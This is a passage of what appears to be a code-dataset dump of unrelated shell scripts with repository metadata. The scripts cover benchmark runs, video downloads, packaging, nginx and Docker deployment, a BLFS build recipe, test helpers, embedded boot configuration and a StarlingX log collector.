echo end at: `date`
| true |
34d39421bcd2b07a1e8e69d12b39e4343a6000d2 | Shell | arangodb/1mDocsPerSec | /doit2.sh | UTF-8 | 913 | 2.578125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
function waitvoll() {
while [ `date +%S` != "00" ] ; do
echo Waiting for full minute...
sleep 0.5
done
}
export ACTION="WARMUP"
export READPERCENTS=100
waitvoll
./run.sh ${ACTION} 0
export ACTION="READ"
export READPERCENTS=100
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
export ACTION="WRITE"
export READPERCENTS=0
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
export ACTION="RW"
export READPERCENTS=50
waitvoll
./run.sh ${ACTION}1x20 0
waitvoll
./run.sh ${ACTION}1x40 0 0
waitvoll
./run.sh ${ACTION}1x60 0 0 0
waitvoll
./run.sh ${ACTION}1x80 0 0 0 0
waitvoll
./run.sh ${ACTION}1x100 0 0 0 0 0
| true |
f45a693469bccfcb1806f173eb566a3b3a9b0b01 | Shell | TommoCrabb/Telly-Wangler | /downloader.bash | UTF-8 | 3,540 | 4.46875 | 4 | [] | no_license | #!/usr/bin/env bash
# set -x
# Use these as tags to format text from the "echo -e" command (eg: echo -e "This is some ${RED}red${REG} text.")
RED='\033[0;31m' # Red
BLU='\033[0;34m' # Blue
PUR='\033[0;35m' # Purple
REG='\033[0m' # Regular (use this as a closing tag)
this_file=$( readlink -e "${0}" )
this_dir=$( dirname "${this_file}" )
timestamp=$( date +%Y-%m-%d_%H%M%S )
error_file="${timestamp}_error"
log_file="${timestamp}_log"
fail_file="${timestamp}_fail"
done_file="${timestamp}_done"
function throw_error
# Takes a string as argument and writes it to both ${error_file} and stdout (in red text).
# If a 2nd argument of '1' is supplied, print exit message & exit.
{
echo -e "${RED}ERROR: ${1}${REG}"
echo -e "${1}" >> "${error_file}"
[[ "${2}" == 1 ]] && { echo "${RED}EXITING...${REG}" ; exit ; }
}
function log_this
# Takes a string as argument and writes it to both ${log_file} and stdout (in blue text).
{
echo -e "${BLU}${1}${REG}"
echo -e "${1}" >> "${log_file}"
}
function failed_download
# Takes a string as argument and writes it to both ${fail_file} and stdout (in red text).
{
echo -e "${RED}FAILED DOWNLOAD: ${1}${REG}"
echo -e "${1}" >> "${fail_file}"
}
function finished_download
{
echo -e "${BLU}FINISHED DOWNLOAD: ${1}${REG}"
echo -e "${1}" >> "${done_file}"
}
# function change_dir
# # Takes the location of a directory as argument and tries to cd into it. Exits on failure.
# {
# if [[ "${PWD}" != "${1}" ]] ; then
# cd "${1}" || { throw_error "COULDN'T 'cd' INTO '${1}'. EXITING." ; ; }
# fi
# }
function check_file
# Takes 2 strings. With the 1st, each character represents a tests to be performed on a file or directory.
# 2nd string is the file or directory to be tested. If any test fails, immediately returns a value of '1'.
{
local t="${1}"
local f="${2}"
local i
for (( i=0 ; $i < ${#t} ; i++ )) ; do
case "${t:$i:1}" in
r) [[ -r "$f" ]] || { throw_error "CAN'T READ '${f}'." ; return 1 ; } ;;
w) [[ -w "$f" ]] || { throw_error "CAN'T WRITE TO '${f}'." ; return 1 ; } ;;
x) [[ -x "$f" ]] || { throw_error "CAN'T EXECUTE '${f}'." ; return 1 ; } ;;
f) [[ -f "$f" ]] || { throw_error "CAN'T FIND FILE '${f}'." ; return 1 ; } ;;
d) [[ -d "$f" ]] || { throw_error "CAN'T FIND DIRECTORY '${f}'." ; return 1 ; } ;;
*) throw_error "FUNCTION 'check_file' FAILED TO MATCH '${t:$i:1}'." ; return 1 ;;
esac
done
}
function set_config_file
# Takes 1 string as argument and uses it to set the location of the ${config_file} that youtube-dl should use.
{
config_file="${this_dir}/youtube-dl-${1}.conf"
check_file fr "${config_file}" || throw_error "Couldn't find config file ${config_file}." 1
}
function download_file
{
youtube-dl --config-location "${config_file}" "${1}" && finished_download "${1}" || failed_download "${1}"
}
function get_simple
{
set_config_file "${1}"
download_file "${2}"
}
function check_source
{
case "${1}" in
\#*) log_this "SKIPPING COMMENTED LINE: ${1}" ;;
daily) get_daily ;;
*iview.abc.net.au/*) get_simple "abc" "${1}" ;;
*sbs.com.au/ondemand/video/*) get_simple "sbs" "${1}" ;;
nine) get_9 "${1}" ;;
seven) get_7 "${1}" ;;
ten) get_10 "${1}" ;;
*twitch.tv*) get_twitch "${1}" ;;
*youtube.com*) get_youtube "${1}" ;;
*) throw_error "FAILED TO RECOGNISE INPUT '${1}'" ;;
esac
}
for arg in "${@}" ; do
if check_file fr "${arg}" ; then
while read line ; do check_source "${line}" ; done < "${arg}"
else
check_source "${arg}"
fi
done
| true |
deb02be2d06aba7af94fbd48c561aa3b68905b11 | Shell | michael-pryor/Hologram | /deploy/package | UTF-8 | 461 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh -e
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SOURCE_PATH="${DIR}/.."
DEST_PATH="${DIR}/../builds"
if [ ! -d "${DEST_PATH}" ]; then
mkdir "${DEST_PATH}"
fi
cd "${SOURCE_PATH}"
now=$(date +"%d_%m_%Y_%H_%M_%S")
DEST_FULL_PATH="${DEST_PATH}/hologram_server_${now}.tgz"
tar czvfh "${DEST_FULL_PATH}" PythonServer bin apps security/generate.sh security/hologram_private.cer
echo "Resulting package written to: ${DEST_FULL_PATH}"
exit 0
| true |
6ac09c4d55c5906d1567903f3917ee670aa8b5c6 | Shell | mizdra/isucon10 | /sokkyou/deploy_nginx.sh | UTF-8 | 330 | 2.5625 | 3 | [] | no_license | #!/bin/bash
source ./sokkyou/sokkyou.sh
echo "⚡️ Deploy nginx"
for REMOTE in ${NGINX[@]}; do
echo "🚀 Deploy nginx ($REMOTE $USER)"
RSYNC conf/nginx/nginx.conf /etc/nginx/nginx.conf
RSYNC conf/nginx/sites-available/isuumo.conf /etc/nginx/sites-available/isuumo.conf
ssh $REMOTE "sudo systemctl restart nginx"
done
| true |
ead0079e6d4e71aa1379261b39547132cf09e158 | Shell | enesutku07/lfscript | /scripts/blfs-18652-unchecked/fuse2 | UTF-8 | 1,431 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# The instructions in this file are extracted from
# 'Beyond Linux From Scratch' (2017-04-29 / r18652) but are modified for use
# with LFScript 4 which installs the software to a fake root directory.
#
# Beyond Linux From Scratch is released under the MIT license.
# Copyright (C) 2001-2017, The BLFS Development Team
WGETLIST="https://github.com/libfuse/libfuse/releases/download/fuse-2.9.7/fuse-2.9.7.tar.gz"
MD5SUMLIST="9bd4ce8184745fd3d000ca2692adacdb"
###############################################
installation() { # INSTALLING SYSTEM SOFTWARE #
###############################################
./configure --prefix=/usr \
--disable-static \
--exec-prefix=/
make
make DESTDIR=$PWD/Dest install
cp -v Dest/lib/*.so.* ${FAKEROOT}/lib
ln -sv ../../lib/libfuse.so.2 ${FAKEROOT}/usr/lib/libfuse.so
ln -sv ../../lib/libulockmgr.so.1 ${FAKEROOT}/usr/lib/libulockmgr.so
cp -v Dest/lib/pkgconfig/* ${FAKEROOT}/usr/lib/pkgconfig
cp -v Dest/bin/* ${FAKEROOT}/bin
cp -v Dest/sbin/mount.fuse ${FAKEROOT}/sbin
install -vdm755 ${FAKEROOT}/usr/include/fuse
cp -v Dest/usr/include/*.h ${FAKEROOT}/usr/include
cp -v Dest/usr/include/fuse/*.h ${FAKEROOT}/usr/include/fuse/
cp -v Dest/usr/share/man/man1/* ${FAKEROOT}/usr/share/man/man1
#################
} # END OF FILE #
#################
| true |
eaaee1df5506d588802ccf313361f89f8c3cf4b2 | Shell | liloman/heal-bitrots | /tests/test_helper.bash | UTF-8 | 1,813 | 3.21875 | 3 | [] | no_license | #!/usr/bin/env bash
# LC_ALL=en_US.UTF-8
# LANGUAGE=en_US.UTF-8
LANG=C
check_fail() {
local temp=/tmp/bats.log
> $temp
for line; do
echo "$line" >> $temp
done
cat /tmp/.heal_bitrot.log >> $temp
}
generate_bitrot() {
local dest=$1 temp=/tmp/temp-base
local -i count=$(($2*100)) percent=${3:-5}
mkdir -p "${dest%/*}"
local dir_base=${dest%%/*}
touch "$dest" $temp
#let's make sure they shared the same timestamp
touch "$dest" -r $temp
dd if=/dev/zero of="$dest" bs=1k count=$count &>/dev/null
run $r "$dir_base"
#modify it and change modify date to base-file, simulate bitrot so
dd seek=1k if=/dev/urandom of="$dest" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
touch "$dest" -r $temp
\rm -f $tmp
run $r "$dir_base"
}
generate_bitrots() {
local dest=$1 dest2=$2 temp=/tmp/temp-base
local -i count=$(($3*100)) percent=${4:-5}
mkdir -p "${dest%/*}"
mkdir -p "${dest2%/*}"
local dir_base=${dest%/*}
local dir_base2=${dest2%/*}
touch "$dest2" "$dest" $temp
#let's make sure they shared the same timestamp
touch "$dest" -r $temp
touch "$dest2" -r $temp
dd if=/dev/zero of="$dest" bs=1k count=$count &>/dev/null
dd if=/dev/zero of="$dest2" bs=1k count=$count &>/dev/null
run $r "$dir_base" "$dir_base2"
#modify it and change modify date to base-file, simulate bitrot so
dd seek=1k if=/dev/urandom of="$dest" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
dd seek=1k if=/dev/urandom of="$dest2" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
touch "$dest" -r $temp
touch "$dest2" -r $temp
\rm -f $tmp
echo $status > /tmp/status
run $r "$dir_base" "$dir_base2"
echo $status >> /tmp/status
}
| true |
98e7eedd9071c1654c3e06dfc1d2483be739b186 | Shell | fourjs-oe/genero_gas_centos_docker | /docker_build_genero_image.sh | UTF-8 | 1,594 | 3.796875 | 4 | [] | no_license | #!/usr/bin/env bash
fail()
{
echo "$@"
exit 1
}
# Docker image name
GENERO_DOCKER_IMAGE=${GENERO_DOCKER_IMAGE:-genero}
# Defaults
HOST_APACHE_PORT=${HOST_APACHE_PORT:-8080}
##### Apache file where passwords will be stored
APACHE_AUTH_FILE=${APACHE_AUTH_FILE:-apache-auth}
##### gasadmin user password for apache
GASADMIN_PASSWD=${GASADMIN_PASSWD:-gasadmin}
##### Provide ROOT_URL_PREFIX base on HOST_APACHE_PORT
ROOT_URL_PREFIX=http://localhost:${HOST_APACHE_PORT}/gas
##### FGLGWS package
FGLGWS_PACKAGE=${FGLGWS_PACKAGE:-$(ls -tr fjs-fglgws-*l64xl212.run | tail -n 1)}
##### GAS package
GAS_PACKAGE=${GAS_PACKAGE:-$(ls -tr fjs-gas-*l64xl212.run | tail -n 1)}
##### Ensure packages to install are provided.
[ -z "${FGLGWS_PACKAGE}" ] && fail "No fglgws package provided. FGLGWS_PACKAGE environment variable is missing."
[ -z "${GAS_PACKAGE}" ] && fail "No gas package provided. GAS_PACKAGE environment variable is missing."
cp ${FGLGWS_PACKAGE} fglgws-install.run || fail "Failed to copy ${FGLGWS_PACKAGE} to ./fglgws-install.run"
cp ${GAS_PACKAGE} gas-install.run || fail "Failed to copy ${GAS_PACKAGE} to ./fglgws-install.run"
##### Generate the password file
htpasswd -cb apache-auth gasadmin ${GASADMIN_PASSWD}
##### Build the Genero GAS image
docker build --pull --force-rm --build-arg FGLGWS_PACKAGE=fglgws-install.run \
--build-arg GAS_PACKAGE=gas-install.run \
--build-arg ROOT_URL_PREFIX=${ROOT_URL_PREFIX} \
--build-arg APACHE_AUTH_FILE=${APACHE_AUTH_FILE} \
-t ${GENERO_DOCKER_IMAGE} .
rm -f fglgws-install.run gas-install.run
| true |
5058424bae30e9a505c6ebbdeb4eb92053133e87 | Shell | fnivek/Scripts | /shebang | UTF-8 | 754 | 4.28125 | 4 | [] | no_license | #!/bin/bash
print_usage () {
printf "Usage: $0 [options] file\n\t-p python\n\t-s sh\n\t-b bash\n\t-h help\n"
exit 0
}
# Parse options
while getopts :psb opt; do
case $opt in
p)
p=${OPTARG}
;;
s)
s=${OPTARG}
;;
b)
b=${OPTARG}
;;
*)
print_usage
;;
esac
done
# Parse file
if [[ $(($# - $OPTIND)) -lt 0 ]]; then
# No file passed
echo "No file passed"
print_usage
fi
f=${@:OPTIND:1}
if [ ! -f $f ]; then
echo "$f is not a file"
print_usage
fi
shebang="#!/usr/bin/env python"
if ! [[ -z ${s+x} ]]; then
shebang="#!/bin/sh"
elif ! [[ -z ${b+x} ]]; then
shebang="#!/bin/bash"
fi
num_lines="$(cat $f | wc -l)" 2> /dev/null
if [ ${num_lines} -eq 0 ]; then
echo ${shebang} >> $f
exit 0
fi
sed -i "1 i${shebang}" $f
| true |
891626ed87a6950d7071a8aa814118120d9beaea | Shell | jbuchbinder/gophotobooth | /photobooth-montage.sh | UTF-8 | 861 | 3.5625 | 4 | [] | no_license | #!/bin/bash
# photobooth-montage.sh
# @jbuchbinder
#
# Create a photobooth-style montage of the four photos created by gophotobooth.
# Specify list of directories (without ending slashes) to create photobooth
# composites.
#
# Requires:
# - imagemagick's 'montage' utility
# - dcraw
SIZE=1000
EXT="CR2"
for dir in $*; do
d=${dir//\/}
if [ ! -f ${d}-photobooth.jpg ]; then
REMOVELIST=""
FILES=""
for f in $d/*.${EXT}; do
BN=$( basename "$f" )
dcraw -e $f
mv ${f//.$EXT}.thumb.jpg /tmp/${BN//.$EXT}.thumb.jpg
REMOVELIST="$REMOVELIST /tmp/${BN//.$EXT}.thumb.jpg"
FILES="$FILES /tmp/${BN//.$EXT}.thumb.jpg"
done
montage -verbose -label '' \
-font Ubuntu -pointsize 32 \
-background '#000000' -fill 'gray' -define jpeg:size=${SIZE}x${SIZE} \
-geometry ${SIZE}x${SIZE}+2+2 -auto-orient $FILES ${d}-photobooth.jpg
rm -f $REMOVELIST
fi
done
| true |
a7bc0df21e7b66eb79fc870908fd9508b8b96bfe | Shell | andriykutsevol/Linux-Buildroot-ARM | /files_patch/etc/init.d/sysfs.sh | UTF-8 | 7,450 | 3.359375 | 3 | [] | no_license | #!/bin/sh
#echo "We are: $0 : $1"
if [ -e /proc ] && ! [ -e /proc/mounts ]; then
mount -t proc proc /proc
#echo " mount -t proc proc /proc"
fi
if [ -e /sys ] && ! [ -e /sys/kernel ] && grep -q sysfs /proc/filesystems; then
mount sysfs /sys -t sysfs
#echo " mount sysfs /sys -t sysfs"
fi
#echo " From sysfs.h"
#if [ -d /sys/class ]; then echo "/sys/class OK"; fi
#if [ -d /sys/class/gpio ]; then echo "/sys/class/gpio OK"; fi
#if [ -d /sys/class/gpio/gpio76 ]; then echo "/sys/class/gpio/gpio76 OK"; fi
#if [ -f /sys/class/gpio/gpio76/value ]; then echo "/sys/class/gpio/gpio76/value OK"; fi
#echo "From sysfs.h"
mount -t devtmpfs devtmpfs /dev
mkdir -m 0755 /dev/pts
mkdir -m 1777 /dev/shm
mount -a
if [ ! -e "/lib/modules/$(uname -r)"/modules.dep ] ; then
#echo " mkdir -p /lib/modules/uname"
mkdir -p /lib/modules/$(uname -r)
# depmod not install yet
# see http://buildroot.uclibc.org/downloads/manual/manual.html -- /dev managenemt
#depmod -ae
fi
#---------------------------------------
# md5
#if [ ! -b /dev/mmcblk0p4 ]; then
# echo "error: ! -b /dev/mmcblk0p4 " >> /etc/immed_reboot
# echo "system will be reboted"
# exit 1
#
#else
# mount /dev/mmcblk0p4 /mnt/f
# ln -s /mnt/f /root/f
#fi
#---------------------------------------
# logs
mkdir /mnt/D/usr
mkdir /mnt/D/usr/bin
mkdir /mnt/D/usr/bin/Demetro
touch /mnt/D/usr/bin/Demetro/stat.txt
touch /mnt/D/usr/bin/Demetro/errorlog.log
touch /mnt/D/usr/bin/Demetro/nmea_emul_flag.txt
# configs
if [ ! -b /dev/mmcblk0p2 ]; then
echo "Warning: Using default settings."
else
mount /dev/mmcblk0p2 /mnt/D
ln -s /mnt/D /root/D
ln -s /ftpdir /mnt/D/ftpdir
fi
# updates
if [ ! -b /dev/mmcblk0p3 ]; then
echo "Warning: Update is imposible."
else
mount /dev/mmcblk0p3 /mnt/E
ln -s /mnt/E /root/E
fi
# # #---------------------------------------
# #
# # #---------------------------------------
# # #---------- MD5SUM mmc C: ------------
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mmc-c.hash ]; then
# #
# # echo "ERROR /mnt/D/md5sums/fmmc-c.hash DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/fmmc-c.hash file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/fmmc-c.hash DOES NOT EXIST" >> /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mmcblk0p1 all /mnt/D/md5sums/mmc-c.hash &
# # fi
# #
# #
# # #---------------------------------------
# # #---------- MD5SUM ------------------
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd1 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd1 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd1 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd1 DOES NOT EXIST" >> /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd1 all /mnt/D/md5sums/mtd1 &
# # fi
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd2 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd2 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd2 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd2 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd2 all /mnt/D/md5sums/mtd2 &
# # fi
# #
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd3 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd4 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd3 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd3 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd3 all /mnt/D/md5sums/mtd3 &
# # fi
# #
# # #---------------------------------------
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd4 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd4 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd4 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd4 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd4 40960 /mnt/D/md5sums/mtd4 & # size in KB
# # fi
#---------------------------------------
#--------- Configs -------------------
#---------------------------------------
# First remove configs.
rm /etc/ntp.conf 2> /dev/null
rm /etc/resolv.conf 2> /dev/null
rm /etc/vsftpd.conf 2> /dev/null
rm /etc/network/interfaces 2> /dev/null
rm /usr/bin/Demetro/boot.cfg 2> /dev/null
rm /usr/bin/Demetro/enable.cfg 2> /dev/null
# Then check configs on D:
if [ ! -f /mnt/D/etc/ntp.conf ]; then
echo "ERROR: /mnt/D/etc/ntp.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/ntp.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/resolv.conf ]; then
echo "ERROR: /mnt/D/etc/resolv.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/resolv.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/network/interfaces ]; then
echo "ERROR: /mnt/D/etc/network/interfaces DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/network/interfaces DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/vsftpd.conf ]; then
echo "ERROR: /mnt/D/etc/vsftpd.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/vsftpd.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/boot.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/boot.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/enable.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/enable.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/enable.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
# And now create the links
ln -s /mnt/D/etc/ntp.conf /etc/ntp.conf
ln -s /mnt/D/etc/resolv.conf /etc/resolv.conf
ln -s /mnt/D/etc/network/interfaces /etc/network/interfaces
ln -s /mnt/D/etc/vsftpd.conf /etc/vsftpd.conf
ln -s /mnt/D/usr/bin/Demetro/boot.cfg /usr/bin/Demetro/boot.cfg
ln -s /mnt/D/usr/bin/Demetro/enable.cfg /usr/bin/Demetro/enable.cfg
ln -s /dev/rtc0 /dev/rtc
ln -s /dev/ttyO0 /dev/gps0
ln -s /dev/pps0 /dev/gpspps0
#---------------------------------------
exit 0
#!/bin/bash
# mountpoint -q $1
# if [ $? == 0 ]
# then
# echo "$1 is a mountpoint"
# else
# echo "$1 is not a mountpoint"
# fi
#-----------------------
# if mountpoint -q $1; then
# echo "$1 is a mountpoint"
# else
# echo "$1 is not a mountpoint"
# fi
| true |
897a82624795d4b391b0fe957d2823de59a68f5d | Shell | orenlivne/ober | /primal/src/system/bin/to-unix-path | UTF-8 | 140 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# Convert a Windows path to a Unix Path. Useful on Cygwin.
if [ $OSTYPE == 'cygwin' ]; then
cygpath -w $1
else
echo $1
fi
| true |
77b1cde0c080ad70fad6a9ed7437dd7ffbb374c4 | Shell | starlingx/utilities | /tools/collector/scripts/collect_host | UTF-8 | 16,659 | 3.390625 | 3 | [
"Apache-2.0"
] | permissive | #! /bin/bash
########################################################################
#
# Copyright (c) 2016-2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
########################################################################
# make these platform.conf variables global.
# values are loaded in source_openrc_if_needed.
export nodetype=""
export subfunction=""
export system_type=""
export security_profile=""
export sdn_enabled=""
export region_config=""
export vswitch_type=""
export system_mode=""
export sw_version=""
# assume this is not the active controller until learned
export ACTIVE=false
#
# Import commands, variables and convenience functions available to
# all collectors ; common and user defined.
#
source /usr/local/sbin/collect_utils
source_openrc_if_needed
#
# parse input parameters
#
COLLECT_NAME="${1}"
DEBUG=${8}
INVENTORY=${9}
set_debug_mode ${DEBUG}
# Calling parms
#
# 1 = collect name
# 2 = start date option
# 3 = start date
# 4 = "any" (ignored - no longer used ; kept to support upgrades/downgrades)
# 5 = end date option
# 6 = end date
# 7 = "any" (ignored - no longer used ; kept to support upgrades/downgrades)
# 8 = debug mode
# 9 = inventory
logger -t ${COLLECT_TAG} "${0} ${1} ${2} ${3} ${4} ${5} ${6} ${7} ${8} ${9}"
# parse out the start data/time data if it is present
STARTDATE_RANGE=false
STARTDATE="any"
if [ "${2}" == "${STARTDATE_OPTION}" ] ; then
if [ "${3}" != "any" -a ${#3} -gt 7 ] ; then
STARTDATE_RANGE=true
STARTDATE="${3}"
fi
fi
# parse out the end date/time if it is present
ENDDATE_RANGE=false
ENDDATE="any"
if [ "${5}" == "${ENDDATE_OPTION}" ] ; then
if [ "${6}" != "any" -a ${#6} -gt 7 ] ; then
ENDDATE_RANGE=true
ENDDATE="${6}"
fi
fi
COLLECT_BASE_DIR="/scratch"
EXTRA="var/extra"
hostname="${HOSTNAME}"
COLLECT_NAME_DIR="${COLLECT_BASE_DIR}/${COLLECT_NAME}"
EXTRA_DIR="${COLLECT_NAME_DIR}/${EXTRA}"
TARBALL="${COLLECT_NAME_DIR}.tgz"
COLLECT_PATH="/etc/collect.d"
RUN_EXCLUDE="/etc/collect/run.exclude"
ETC_EXCLUDE="/etc/collect/etc.exclude"
VAR_LOG_EXCLUDE="/etc/collect/varlog.exclude"
COLLECT_INCLUDE="/var/run /etc /root"
FLIGHT_RECORDER_PATH="var/lib/sm/"
FLIGHT_RECORDER_FILE="sm.eru.v1"
VAR_LOG_INCLUDE_LIST="/tmp/${COLLECT_NAME}.lst"
COLLECT_DIR_USAGE_CMD="df -h ${COLLECT_BASE_DIR}"
COLLECT_DATE="/usr/local/sbin/collect_date"
COLLECT_SYSINV="${COLLECT_PATH}/collect_sysinv"
function log_space()
{
    # Log a labelled snapshot of free space on COLLECT_BASE_DIR.
    #
    # Arguments: $1 - label to embed in the log line
    # Globals:   COLLECT_DIR_USAGE_CMD (read) - "df -h <dir>" command string
    #            COLLECT_BASE_DIR (read)
    # Outputs:   one ilog line containing the df data row
    local msg="${1}"
    local space space1

    # COLLECT_DIR_USAGE_CMD is intentionally unquoted so it word-splits
    # into the command and its arguments; $() replaces the old backticks.
    space="$(${COLLECT_DIR_USAGE_CMD})"
    # Drop df's header row, keeping only the data line.
    space1="$(echo "${space}" | grep -v Filesystem)"
    ilog "${COLLECT_BASE_DIR} ${msg} ${space1}"
}
# Abort early if /scratch does not have enough room for this collect.
space_precheck ${HOSTNAME} ${COLLECT_BASE_DIR}
CURR_DIR=`pwd`
mkdir -p ${COLLECT_NAME_DIR}
cd ${COLLECT_NAME_DIR}
# create dump target extra-stuff directory
mkdir -p ${EXTRA_DIR}
RETVAL=0
# Remove any previous collect error log.
# Start this collect with an empty file.
#
# stderr is directed to this log during the collect process.
# By searching this log after collect_host is run we can find
# errors that occured during collect.
# The only real error that we care about right now is the
#
#    "No space left on device" error
#
rm -f ${COLLECT_ERROR_LOG}
touch ${COLLECT_ERROR_LOG}
chmod 644 ${COLLECT_ERROR_LOG}
echo "`date '+%F %T'` :${COLLECT_NAME_DIR}" > ${COLLECT_ERROR_LOG}
ilog "creating local collect tarball ${COLLECT_NAME_DIR}.tgz"
################################################################################
# Run collect scripts to check system status
################################################################################
function collect_parts()
{
    # Run every collector plugin file found in COLLECT_PATH (/etc/collect.d).
    #
    # Globals (read): COLLECT_PATH COLLECT_SYSINV COLLECT_NAME_DIR EXTRA_DIR
    #                 hostname INVENTORY
    # Each plugin receives <collect dir> <extra dir> <hostname>; the sysinv
    # plugin additionally receives the inventory flag.
    local part
    if [ -d "${COLLECT_PATH}" ]; then
        # Glob (not `ls`) and quote every expansion so paths with spaces work.
        for part in "${COLLECT_PATH}"/*; do
            [ -f "${part}" ] || continue
            if [ "${part}" = "${COLLECT_SYSINV}" ]; then
                "${part}" "${COLLECT_NAME_DIR}" "${EXTRA_DIR}" "${hostname}" "${INVENTORY}"
            else
                "${part}" "${COLLECT_NAME_DIR}" "${EXTRA_DIR}" "${hostname}"
            fi
        done
    fi
}
#######################################
# collect_extra: dump ad-hoc host snapshots into ${EXTRA_DIR}/*.info files
# (process, host, memory, filesystem, iSCSI, bash history, interrupts and
# block devices), with extra sections for controller / worker node types.
# Globals (read): hostname EXTRA_DIR nodetype subfunction SKIP_MASK
#                 PROCESS_DETAIL_CMD BUILD_INFO_CMD COLLECT_ERROR_LOG
# NOTE(review): delimiter/log_slabinfo are presumably provided by
# collect_utils sourced above - confirm there.
#######################################
function collect_extra()
{
    # dump process lists
    LOGFILE="${EXTRA_DIR}/process.info"
    echo    "${hostname}: Process Info ......: ${LOGFILE}"
    delimiter ${LOGFILE} "ps -e -H -o ..."
    ${PROCESS_DETAIL_CMD} >> ${LOGFILE}
    # Collect process and thread info (tree view)
    delimiter ${LOGFILE} "pstree --arguments --ascii --long --show-pids"
    pstree --arguments --ascii --long --show-pids >> ${LOGFILE}
    # Collect process, thread and scheduling info (worker subfunction only)
    # (also gets process 'affinity' which is useful on workers;
    which ps-sched.sh >/dev/null 2>&1
    if [ $? -eq 0 ]; then
        delimiter ${LOGFILE} "ps-sched.sh"
        ps-sched.sh >> ${LOGFILE}
    fi
    # Collect process, thread and scheduling, and elapsed time
    # This has everything that ps-sched.sh does, except for cpu affinity mask,
    # adds:  stime,etime,time,wchan,tty).
    delimiter ${LOGFILE} "ps -eL -o pid,lwp,ppid,state,class,nice,rtprio,priority,psr,stime,etime,time,wchan:16,tty,comm,command"
    ps -eL -o pid,lwp,ppid,state,class,nice,rtprio,priority,psr,stime,etime,time,wchan:16,tty,comm,command >> ${LOGFILE}
    # Collect per kubernetes container name, QoS, and cpusets per numa node
    delimiter ${LOGFILE} "kube-cpusets"
    kube-cpusets >> ${LOGFILE}
    # Various host attributes
    LOGFILE="${EXTRA_DIR}/host.info"
